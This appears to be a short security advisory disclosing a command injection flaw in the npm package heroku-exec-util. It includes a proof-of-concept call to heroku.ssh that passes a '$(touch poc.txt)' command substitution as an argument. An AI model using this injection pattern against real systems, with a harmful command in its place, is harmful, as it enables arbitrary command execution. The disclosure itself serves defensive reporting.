vulnerability command injection
severity 8.8
language javascript
registry npm

✍️ Description

The heroku-exec-util package is vulnerable to Command Injection via argument concatenation.

🕵️‍♂️ Proof of Concept

// poc.js

const heroku = require('heroku-exec-util');
heroku.ssh({args:{}},'$(touch poc.txt)','','test',{path:'test'});

Running the code above creates the file poc.txt, which shows that the shell evaluated the injected $(touch poc.txt) command substitution.

💥 Impact

This vulnerability allows attackers to execute arbitrary OS commands.